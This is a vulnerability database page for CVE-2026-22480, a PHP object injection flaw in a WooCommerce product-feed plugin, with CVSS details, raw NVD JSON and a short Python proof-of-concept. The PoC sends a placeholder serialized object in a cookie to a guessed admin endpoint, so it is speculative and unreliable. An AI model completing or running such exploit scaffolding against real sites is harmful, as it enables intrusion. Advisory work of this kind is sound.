Security Vulnerability Report
中文
CVE-2026-22480 CVSS 7.2 HIGH

CVE-2026-22480

Published: 2026-03-25 17:16:31
Last Modified: 2026-04-24 16:32:54

Description

Deserialization of Untrusted Data vulnerability in WebToffee Product Feed for WooCommerce webtoffee-product-feed allows Object Injection.This issue affects Product Feed for WooCommerce: from n/a through <= 2.3.3.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WebToffee Product Feed for WooCommerce <= 2.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-22480 (PHP Object Injection) # Usage: python3 poc.py <target_url> import requests import sys import urllib.parse def exploit(url): # The vulnerable endpoint typically handles plugin settings or export actions target_endpoint = f"{url}/wp-admin/admin.php?page=wf_product_feed_settings" # Placeholder payload: In a real scenario, this would be a specific PHP gadget chain # serialized to trigger code execution (e.g., using a library like PHPGGC). # Example: O:20:"Monolog\Handler\SyslogUdpHandler":1:{...} malicious_payload = "O:8:"StdClass":0:{}" cookies = { "wf_feed_settings": urllib.parse.quote(malicious_payload) } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: print(f"[*] Sending payload to {target_endpoint}") response = requests.get(target_endpoint, headers=headers, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check server logs or response for indication of deserialization.") else: print(f"[-] Unexpected response code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py <target_url>") else: exploit(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22480", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:30.650", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in WebToffee Product Feed for WooCommerce webtoffee-product-feed allows Object Injection.This issue affects Product Feed for WooCommerce: from n/a through <= 2.3.3."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en WebToffee Product Feed for WooCommerce webtoffee-product-feed permite la inyección de objetos. Este problema afecta a Product Feed for WooCommerce: desde n/a hasta &lt;= 2.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webtoffee-product-feed/vulnerability/wordpress-product-feed-for-woocommerce-plugin-2-3-3-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}